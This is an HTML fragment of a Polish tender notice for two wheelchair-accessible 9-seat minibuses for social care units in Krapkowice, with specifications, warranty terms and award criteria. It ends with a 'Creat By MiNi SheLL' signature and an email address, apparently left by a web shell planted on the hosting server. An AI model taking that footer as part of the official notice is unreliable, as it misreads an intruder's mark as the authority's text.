              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dostawa 9-cio (8+1) miejscowego  samochodu osobowego typu mikrobus przystosowanego do przewozu osób niepełnosprawnych, w tym dwóch osób  na wózkach inwalidzkich, przeznaczonego dla  Warsztatu Terapii Zajęciowej w Krapkowicach.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Charakterystyka ogólna:
    a) model pojazdu - powinien być aktualnie wytwarzany przez producenta, rok produkcji 
        2016 lub 2017, którego autoryzowane stacje obsługi znajdują się na terenie Polski.  
         Pojazd  musi spełniać wszystkie wymagania wynikające z  ustawy z dnia 20 czerwca 
        1997 r. Prawo o ruchu drogowym (Dz. U. z 2012 r., poz. 1137 ze zm.) oraz 
         rozporządzeń wykonawczych do tej ustawy. 	
         Masa całkowita do 3,5t.,
    b) kolor nadwozia: dowolny z grupy następujących barw: czerwony , granatowy, biały,    
        szary, ciemno-zielony. Fabrycznie   lakierowany. 
    c) dostarczony pojazd winien mieć wykonane przez Dostawcę  i na jego koszt przegląd 
        zerowy  potwierdzony w książce gwarancyjnej pojazdu.


2. Nadwozie :
a)	typ nadwozia: osobowy - kombi; rozstaw osi min. 3400mm; długość całkowita pojazdu min. 5300mm, 
b)	przedział pasażerski : 2 rzędy siedzeń, możliwość zamontowania dwóch wózków inwalidzkich zamiennie z 2 rzędem siedzeń; atestowane mocowania dla wózków inwalidzkich  , pasy bezpieczeństwa dla wszystkich pasażerów,
c)	tylne drzwi dwuskrzydłowe, przeszklone, otwierane pod kątem min. 180°, drzwi boczne przesuwne  prawe, 
d)	szyby w kabinie kierowcy sterowane elektronicznie,
e)	fotel kierowcy z podłokietnikiem, z regulacją wielopłaszyznową,
      f)   kolumna kierownicy regulowana w dwóch płaszczyznach.

3. Bezpieczeństwo :
      a) przednie poduszki powietrzne ( kierowca i pasażer),
      b) system zapobiegający blokowaniu kół podczas hamowania  (ABS),
      c) immobiliser,
      d) światła przeciwmgielne przednie,
      e) autoalarm,
      f) czujnik sygnalizacji niekontrolowanego otwarcia drzwi lub ich niezamknięcia,
      g) elektroniczny system stabilizacji toru jazdy (ESP),
      h) hamulce tarczowe z przodu i z tyłu.
      i) czujniki odległości przód i tył, po min 4 czujniki.


4. Komfort i funkcjonalność :
      a) klimatyzacja automatyczna i ogrzewanie z nawiewem na przód i przedział pasażerski,
      b) tapicerka foteli  materiał o podwyższonej trwałości, ciemnej barwy,
      c) centralny zamek sterowany pilotem,
      d) szyba tylna ogrzewana , wycieraczka i spryskiwacz szyby tylnej,
      e) dywaniki gumowe dla kierowcy i pasażerów,  tylne chlapacze,
      f) radioodtwarzacz z systemem BLUETOOTH i z zestawem głośników, antena,
      g) koła stalowe 16 lub 17 z oponami zimowymi,
           Opony fabrycznie nowe, homologowane. Nie dopuszcza się opon bieżnikowanych. 
           Opony nie mogą być starsze niż 52 tygodnie licząc od końcowego terminu realizacji   
            umowy,
       h)	zagłówki foteli przednich i tylnych regulowane,
       i)	okładzina ścian bocznych przestrzeni pasażerskiej zabudowana na całej wysokości,   
            trwała i zmywalna,

5. Warunki techniczne :
       a)	skrzynia biegów manualna min. 5 biegów + wsteczny,
       b)	silnik diesel; poj. od 1.500 cm3 do 2.300cm3 ,
       c)	moc silnika min. 130KM,
       d) napęd przedni lub tylny
       e)	wspomaganie kierownicy.
       f) pojazd musi spełniać standardy emisji spalin ( tlenków azotu, cząstek stałych oraz 
            węglowodorów )  EURO 6.
       g) wielkość emisji dwutlenku węgla nie większa niż 210g/km
       
        Wielkości emisji dwutlenku węgla   podana w g/km zmierzona według procedury ustalonej dla
         celów badań homologacyjnych, a w przypadku pojazdów nieobjętych tą procedurą 
         określoną według innej metody pomiaru emisji, zapewniającej porównywalność ofert. 
        Zaoferowana wielkość emisji dwutlenku węgla w cyklu mieszanym/łączonym musi być
         zgodna z wielkością podaną w dostarczonym przed podpisaniem umowy świadectwie
         zgodności WE, zmierzona wg. procedury ustalonej dla celów badań homologacyjnych. 

6. Wyposażenie dodatkowe :
       a)	pełnowymiarowe koło zapasowe wyposażone w oponę letnią, 
       b)	pełnowymiarowe kołpaki kół,
       c)	 dodatkowy  komplet kół letnich z felgami,
       d)	najazdy aluminiowe składane,
       e)	apteczka pierwszej pomocy zgodna z normą UE wg. DIN 13164,  
       f)	gaśnica samochodowa z homologacją,
       g)	trójkąt ostrzegawczy,
       h)	wbudowany system nawigacji z mapą Polski i wyświetlaczem. Przewodnictwo 
           głosowe w języku  polskim.
       i) niezależne ogrzewanie postojowe

7. Dokumenty:
       a)	karta pojazdu,
       b)	karta gwarancyjna, instrukcja obsługi w języku polskim oraz inne wymagane prawem   
           dokumenty  na pojazd i wyposażenie,
       c)	wykaz punktów świadczących serwis gwarancyjnych,
       d)	homologacja pojazdu bazowego,
       e) homologacja pojazdu do przewozu osób niepełnosprawnych.
       
8. Warunki gwarancji :
     a) okres gwarancji na podzespoły mechaniczne, elektryczne i elektroniczne, zwanej dalej    
         gwarancją mechaniczną: min. 24 miesiące bez limitu kilometrów (wg oświadczenia   
          Wykonawcy ), 
     b) okres gwarancji na powłokę lakierniczą: min. 24 miesiące, 
     c) okres gwarancji na perforację nadwozia: min. 72 miesiące.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34110000-1, 34115200-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 22/02/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji mechanicznej ( w miesiącach)</td><td>20</td></tr><tr><td>zużycie energii</td><td>10</td></tr><tr><td>zużyie paliw w cyklu mieszanym w l/km</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Dostawa 9-cio (8+1) miejscowego  samochodu osobowego typu mikrobus przystosowanego do przewozu osób niepełnosprawnych, w tym dwóch osób  na wózkach inwalidzkich przeznaczonego dla Środowiskowego Domu Samopomocy w Krapkowicach.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Charakterystyka ogólna:
    a) model pojazdu - powinien być aktualnie wytwarzany przez producenta, rok produkcji 
        2016 lub 2017, którego autoryzowane stacje obsługi znajdują się na terenie Polski.  
         Pojazd  musi spełniać wszystkie wymagania wynikające z  ustawy z dnia 20 czerwca 
        1997 r. Prawo o ruchu drogowym (Dz. U. z 2012 r., poz. 1137 ze zm.) oraz 
         rozporządzeń wykonawczych do tej ustawy. 	
         Masa całkowita do 3,5t.,
    b) kolor nadwozia: dowolny z grupy następujących barw: czerwony , granatowy, biały,    
        szary, ciemno-zielony. Fabrycznie   lakierowany. 
    c) dostarczony pojazd winien mieć wykonane przez Dostawcę  i na jego koszt przegląd 
        zerowy  potwierdzony w książce gwarancyjnej pojazdu.


2. Nadwozie :
a)	typ nadwozia: osobowy - kombi; rozstaw osi min. 3400mm; długość całkowita pojazdu min. 5300mm, 
b)	przedział pasażerski : 2 rzędy siedzeń, możliwość zamontowania dwóch wózków inwalidzkich zamiennie z 2 rzędem siedzeń; atestowane mocowania dla wózków inwalidzkich  , pasy bezpieczeństwa dla wszystkich pasażerów,
c)	tylne drzwi dwuskrzydłowe, przeszklone, otwierane pod kątem min. 180°, drzwi boczne przesuwne  prawe, 
d)	szyby w kabinie kierowcy sterowane elektronicznie,
e)	fotel kierowcy z podłokietnikiem, z regulacją wielopłaszyznową,
      f)   kolumna kierownicy regulowana w dwóch płaszczyznach.

3. Bezpieczeństwo :
      a) przednie poduszki powietrzne ( kierowca i pasażer),
      b) system zapobiegający blokowaniu kół podczas hamowania  (ABS),
      c) immobiliser,
      d) światła przeciwmgielne przednie,
      e) autoalarm,
      f) czujnik sygnalizacji niekontrolowanego otwarcia drzwi lub ich niezamknięcia,
      g) elektroniczny system stabilizacji toru jazdy (ESP),
      h) hamulce tarczowe z przodu i z tyłu.
      i) czujniki odległości przód i tył, po min 4 czujniki.


4. Komfort i funkcjonalność :
      a) klimatyzacja automatyczna i ogrzewanie z nawiewem na przód i przedział pasażerski,
      b) tapicerka foteli  materiał o podwyższonej trwałości, ciemnej barwy,
      c) centralny zamek sterowany pilotem,
      d) szyba tylna ogrzewana , wycieraczka i spryskiwacz szyby tylnej,
      e) dywaniki gumowe dla kierowcy i pasażerów,  tylne chlapacze,
      f) radioodtwarzacz z systemem BLUETOOTH i z zestawem głośników, antena,
      g) koła stalowe 16 lub 17 z oponami zimowymi,
           Opony fabrycznie nowe, homologowane. Nie dopuszcza się opon bieżnikowanych. 
           Opony nie mogą być starsze niż 52 tygodnie licząc od końcowego terminu realizacji   
            umowy,
       h)	zagłówki foteli przednich i tylnych regulowane,
       i)	okładzina ścian bocznych przestrzeni pasażerskiej zabudowana na całej wysokości,   
            trwała i zmywalna,

5. Warunki techniczne :
       a)	skrzynia biegów manualna min. 5 biegów + wsteczny,
       b)	silnik diesel; poj. od 1.500 cm3 do 2.300cm3 ,
       c)	moc silnika min. 130KM,
       d) napęd przedni lub tylny
       e)	wspomaganie kierownicy.
       f) pojazd musi spełniać standardy emisji spalin ( tlenków azotu, cząstek stałych oraz 
            węglowodorów )  EURO 6.
       g) wielkość emisji dwutlenku węgla nie większa niż 210g/km
       
        Wielkości emisji dwutlenku węgla   podana w g/km zmierzona według procedury ustalonej dla
         celów badań homologacyjnych, a w przypadku pojazdów nieobjętych tą procedurą 
         określoną według innej metody pomiaru emisji, zapewniającej porównywalność ofert. 
        Zaoferowana wielkość emisji dwutlenku węgla w cyklu mieszanym/łączonym musi być
         zgodna z wielkością podaną w dostarczonym przed podpisaniem umowy świadectwie
         zgodności WE, zmierzona wg. procedury ustalonej dla celów badań homologacyjnych. 

6. Wyposażenie dodatkowe :
       a)	pełnowymiarowe koło zapasowe wyposażone w oponę letnią, 
       b)	pełnowymiarowe kołpaki kół,
       c)	 dodatkowy  komplet kół letnich z felgami,
       d)	najazdy aluminiowe składane,
       e)	apteczka pierwszej pomocy zgodna z normą UE wg. DIN 13164,  
       f)	gaśnica samochodowa z homologacją,
       g)	trójkąt ostrzegawczy,
       h)	wbudowany system nawigacji z mapą Polski i wyświetlaczem. Przewodnictwo 
           głosowe w języku  polskim.
       i) niezależne ogrzewanie postojowe

7. Dokumenty:
       a)	karta pojazdu,
       b)	karta gwarancyjna, instrukcja obsługi w języku polskim oraz inne wymagane prawem   
           dokumenty  na pojazd i wyposażenie,
       c)	wykaz punktów świadczących serwis gwarancyjnych,
       d)	homologacja pojazdu bazowego,
       e) homologacja pojazdu do przewozu osób niepełnosprawnych.
       
8. Warunki gwarancji :
     a) okres gwarancji na podzespoły mechaniczne, elektryczne i elektroniczne, zwanej dalej    
         gwarancją mechaniczną: min. 24 miesiące bez limitu kilometrów (wg oświadczenia   
          Wykonawcy ), 
     b) okres gwarancji na powłokę lakierniczą: min. 24 miesiące, 
     c) okres gwarancji na perforację nadwozia: min. 72 miesiące.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34110000-1, 34115200-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 22/02/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji mechanicznej (w miesiącach)</td><td>20</td></tr><tr><td>zużycie energii</td><td>10</td></tr><tr><td>zużycie paliwa w cyklu mieszanym w l/100 km</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com